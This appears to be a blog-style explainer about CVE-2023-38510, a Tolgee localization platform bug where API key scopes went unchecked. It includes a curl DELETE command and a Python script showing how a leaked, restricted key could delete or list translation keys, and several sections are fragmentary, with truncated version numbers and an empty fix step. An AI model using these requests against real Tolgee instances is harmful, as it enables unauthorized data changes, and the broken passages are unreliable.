CVE-2023-38510 - How Tolgee's API Key Scope Bug Enabled Unauthorized Access

Tolgee has become a popular choice for developers who need an open-source localization platform. It simplifies managing translations, collaborating with teams, and integrating localization into your CI/CD process. But in mid-2023, a serious security vulnerability—CVE-2023-38510—rocked some Tolgee installations worldwide. If you’re using Tolgee between versions 3.14. and 3.23., you should stop and read this.

What Was the Problem?

In simple terms: When you used an API key to make requests to the Tolgee backend, the backend forgot to check what the key was allowed to do. So, instead of just letting you access specific features, it sometimes let you do everything—skipping permission checks on some endpoints.

If an attacker got hold of an API key (for example, if it was accidentally published on GitHub or in a frontend bundle), they could perform actions that the key shouldn’t normally allow.

Good news: If your API keys were always kept secure and not visible on the public web, nobody could misuse them.
Bad news: If your API keys leaked (intentionally or by accident), attackers could do much more than you thought.

How Did It Work? (With Code Example)

Let’s say you had a restricted API key meant only for translation reading, not writing or deleting. In vulnerable versions, this key could actually be used to delete or change translations.

Here’s a simple example using curl (replace placeholder values as needed)

curl -X DELETE \
  'https://your-tolgee-instance.com/v2/projects/YOUR_PROJECT_ID/keys/TRANSLATION_KEY'; \
  -H 'X-API-KEY: LEAKED_API_KEY'

Expected behavior:
If LEAKED_API_KEY doesn’t have delete permissions, the backend should return a 403 Forbidden error.

Actual behavior (pre-3.23.1):
The backend deletes the translation key anyway, because it doesn't check the API key's scope for this endpoint!

Here’s how a simple script could exploit the bug using just requests

import requests

API_URL = "https://your-tolgee-instance.com/v2/projects/YOUR_PROJECT_ID/keys";
API_KEY = "LEAKED_API_KEY"

# Try to list all translation keys
response = requests.get(API_URL, headers={"X-API-KEY": API_KEY})

print("All keys (should be restricted):", response.json())

This script uses an API key meant for limited access, but the backend returns all keys—like a master administrator key would!

Your project runs Tolgee version 3.14. through 3.23.

- Any of your API keys have been exposed or can be guessed/discovered by outsiders (for example, published in JavaScript frontend code, accidentally committed to a public repository, leaked in logs, etc.)

You use Tolgee version 3.23.1 or newer

Remember: The real-world risk is only present if someone outside your organization gets hold of a working API key. But if that happens—you don't want them bypassing all permission checks.

How Do I Fix It?

Easy fix:

More Reading & References

- 🔗 Tolgee Security Advisory for CVE-2023-38510
- 🔗 CVE-2023-38510 at CVE.org
- 🔗 Tolgee Changelog

Summary

CVE-2023-38510 shows why permission checks—especially for API keys—are crucial. If you’re a Tolgee user, make sure to:

Audit and rotate old or possibly exposed keys.

Let’s keep localization secure for everyone!
If you spot public keys or leftovers in your code, now’s the time to take action.

Timeline

Published on: 07/27/2023 19:15:00 UTC
Last modified on: 08/03/2023 13:41:00 UTC